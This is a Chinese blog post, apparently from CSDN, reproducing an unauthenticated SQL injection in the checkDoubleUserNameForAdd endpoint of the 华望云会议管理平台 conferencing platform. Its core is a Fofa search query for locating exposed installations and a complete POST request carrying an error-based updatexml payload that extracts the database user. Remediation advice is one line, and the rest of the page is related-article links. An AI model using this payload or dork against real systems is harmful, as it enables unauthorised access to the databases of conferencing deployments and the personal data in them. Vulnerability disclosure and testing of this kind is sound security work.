华望云会议管理平台 checkDoubleUserNameForAdd SQL注入复现

于 2024-09-18 10:49:03 发布
阅读量119 收藏
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142327044
版权

0x01 漏洞描述:

华望云会议管理平台是一款基于云计算技术的远程音视频互动软件,致力于为用户提供便捷、易用、低成本的会议解决方案。该平台拥有丰富的功能和广泛的应用场景,能够满足不同用户在不同场景下的会议需求。系统在 checkDoubleUserNameForAdd 接口中存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。

0x02 影响版本:

version <= 3.0.2

0x03 搜索语句:

Fofa:title="华望云会议管理平台"

0x04 漏洞复现:

该漏洞存在于/ajax/checkDoubleUserNameForAdd中,未经身份识别的用户可进行注入攻击

POST /ajax/checkDoubleUserNameForAdd HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

userName=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'

0x05 修复建议:

关闭互联网暴露面或接口设置访问权限

iSee857
关注
专栏目录
华望会议管理平台 checkDoubleUserNameForAdd SQL注入漏洞复现
0xSec
09-09 42
华望会议管理平台 checkDoubleUserNameForAdd 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
华望会议管理平台 多处 SQL注入漏洞复现
0xSec
09-06 132
华望会议管理平台 myconflist.inc、useractionlist、deptactionlist、conflog.inc、confmanger.inc、recodemanger.inc、syslog.inc、recodemangerForUser.inc等接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
华望会议管理平台 多处 SQL注入
iSee857的博客
09-11 412
系统在 myconflist.inc、useractionlist、deptactionlist、conflog.inc、confmanger.inc、recodemanger.inc、syslog.inc、recodemangerForUser.inc 等接口中存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。/page/recodemanger.inc 接口sql注入。/page/myconflist.inc接口sql注入。厂商已发布补丁请即时修复。
华望会议管理平台 recodemangerForUser.inc SQL注入复现
最新发布
iSee857的博客
09-18 137
华望会议管理平台是一款基于计算技术的远程音视频互动软件,致力于为用户提供便捷、易用、低成本的会议解决方案。该平台拥有丰富的功能和广泛的应用场景,能够满足不同用户在不同场景下的会议需求。系统在 recodemangerForUser.inc 接口中存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。该漏洞需要用到系统权限,因此需要通过/ajax/userlogin获取有效cookie。将响应中的cookie带入到后续请求接口中。
华望会议管理平台多处存在SQL注入漏洞
weixin_43167326的博客
09-12 1008
华望会议管理平台是一款基于计算技术的远程音视频互动软件,致力于为用户提供便捷、易用、低成本的会议解决方案。该平台拥有丰富的功能和广泛的应用场景,能够满足不同用户在不同场景下的会议需求。
打破远程沟通壁垒,华望视频会议助阵企业智慧办公
xinyuan82的博客
07-12
不得不说远程办公是当下最潮流和受欢迎的工作模式,既节省了企业的运营成本,又把人们从固定的办公场所解放出来。对于一部分人来说,远程办公使他们的压力变得更小,并且大大缩短了某些不确定性因素浪费的时间成本,有利于他们保持工作和生活的平衡。 但是持反对意见的人认为,远程办公并非百利而无一害:远程办公容易产生个人与公司的隔阂,企业员工之间缺少面对面沟通从而带来信息传递上的麻烦,由于缺乏表情、语调、肢体方面...
轻薄一体、极致超清,华望X3重磅来袭!
xinyuan82的博客
03-01 2
全球首款H.265一体化视频会议终端华望X3重磅上市 春华二月,万物焕新,华望重磅推出全新视频会议一体终端X3,凭借自身先进科技展现出了优秀的成果。内置12 倍光学变焦广角摄像机+H.265视频会议终端,华望X3带来一场超清极简的视频会议之旅。 一体化简约设计,简易安装即刻入会 华望X3整机结构采用一体化紧凑型设计,基于纯嵌入式操作系统及专用硬件设备,完美融合视频会议摄像机与终端为一体。...
LED显示行业之老程序员开始解读LED显示行业
my_share的专栏
08-04 3145
我叫毛华望, 我在LED显示行业做了4年多了,现在还在这个行业里面。第一次进入这个行业进的公司是灵星雨科技有限公司。后来在京视科技继续做LED显示行业,目前在摩西尔科技有限公司。这是一个什么样的行业呢??我来解读解读。 这个是联欢晚会的舞台。舞台的背景就是LED显示。我是做控制卡的,让画面显示出来的工作,就是我的了。 这个是...
国内外做视频会议比较牛的公司有哪些?
热门推荐
ljh081231的专栏
01-17 2万+
国内外做视频会议比较牛的公司有哪些? 关注者 45 被浏览 8,805 关注问题写回答 ​1 条评论 ​分享 ​邀请回答 ​ 22 个回答 默
LED显示行业之知识大全3
my_share的专栏
08-17 1920
最全的LED显示屏知识大全 你好,我叫毛华望, LED工程师。微信15889765314。 六.显示板芯片简介 认识显示板元件工作原理也是对于组装和维修的基础 驱动芯片主要是74HC595 74HC245/244 74HC138 4953。 74HC245的作用:信号功率放大 单元板/模组是由多块串接在一起的,而控制信号是比较弱的,在信号传递过程中需要将它的功率...
华望会议 v3.6.1.8官方版
12-23
为您提供华望会议下载,华望会议软件,界面简洁,操作人性化,带来极简会议体验,可以自由切换布局,华望视频会议,让沟通零距离,高效通信 创新管理!软件特色 华望视频会议 稳定的音视频服务系统 / 1080P...
华旺视频会议客户端cloudhuawang.zip
09-24
华望视频会议客户端】是一款专为用户提供稳定音视频服务的系统,它支持高清的1080P及以上分辨率的视频播放,是远程音视频沟通的高效解决方案。这款名为"cloudhuawang.exe"的压缩包文件是华望V1.0的客户端安装...
华望科技:2019年半年度报告.PDF
05-30
华望科技:2019年半年度报告.PDF
时间&安全精细化管理平台存在未授权访问漏洞
2301_77012231的博客
09-14 375
登录--时间&安全精细化管理平台存在未授权访问漏洞导致与员工信息泄露。
【农信网-注册/登录安全分析报告】
09-16 1011
北京农信互联科技集团有限公司是一家农业互联网高科技企业,以“用互联网改变农业”为使命,致力于构建最有影响力的农业数智生态平台,推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
Java代码审计篇 | ofcms系统审计思路讲解 - 篇4 | XXE漏洞审计
哦 卷!
09-14 872
我发现很多文章包括教程,大概套路是:只说有漏洞的点,将有漏洞的点指出,然后分析代码;或者黑盒测试出漏洞之后,然后分析代码。我认为这是在分析漏洞代码,而非代码审计。代码审计文章或教程应该是从0开始找到漏洞所在,包括思路!所以这里不管有没有漏洞,我都会把审计过程写出来,因此篇幅会很长,但我认为这样对你会很有帮助。知其然亦知所以然。XXE漏洞审计Java代码审计篇 | ofcms系统审计思路讲解 - 篇1 | 环境搭建、路由机制。
远程跨境传输大文件如何做到安全又稳定?
镭速的博客
09-14 636
在当今全球化的商业环境中,企业跨境传输大文件的需求日益增长。这不仅涉及到数据的快速迁移,还包括了安全性、稳定性和合规性等多重挑战。本文将探讨企业在跨境传输大文件时可能遇到的问题,以及在传输过程中应注意的事项,并重点介绍镭速在方面的优势。
对称密码中的密钥是如何实现安全配送的?
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
09-17 531
密钥配送问题是指在对称密码算法中,加密和解密使用同一个密钥,发送方必须设法将密钥安全地发送给接收方,而不会被第三方窃听者截获。如果密钥被窃取,那么加密的数据也会被破解,因此密钥的安全配送成为对称密码算法的一个关键问题。为了解决这个问题,密码学领域发展出了多种策略和解决方案。通过通信双方事先共享密钥密钥来解决通过密钥分配中心(KDC)来解决通过密钥交换Diffie-Hellman(DH)来解决通过公钥密码来解决。
信刻光盘安全隔离与信息交换系统
cdprinter的博客
09-11 441
信刻按需研制的光盘安全隔离与信息交换系统,应用不同等级网络之间进行可靠、高效的安全数据交换,实现A网-B网,B网-A网双向摆渡。集数据自动摆渡、用户管理、日志管理、加密及杀毒、数据检查与过滤、校验、安全审计等功能于一体。
38900 机动车安全检测
长安不及十里的博客
09-14 1094
2、三轴及三轴以上的货车,对部分轴(最后一轴及货车第一轴除外)还应测试加载轴制动率和加载轴制动不平衡率。2、三轴及三轴以上的货车,对部分轴(最后一轴及货车第一轴除外)还应测试加载轴制动率和加载轴制动不平衡率﹔采用空气悬架的车辆、总质量为整备质量1.2倍以下的车辆不测试加载轴制动率和加载轴制动不平衡率。**备注:**外廓尺寸、核定载人数和座椅布置和整备质量项目仅适用于带驾驶室的正三轮摩托车以及不带驾驶室、不具有载运货物结构或功能且设计和制造上最多乘坐2人(包括驾驶人)的正三轮摩托车。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值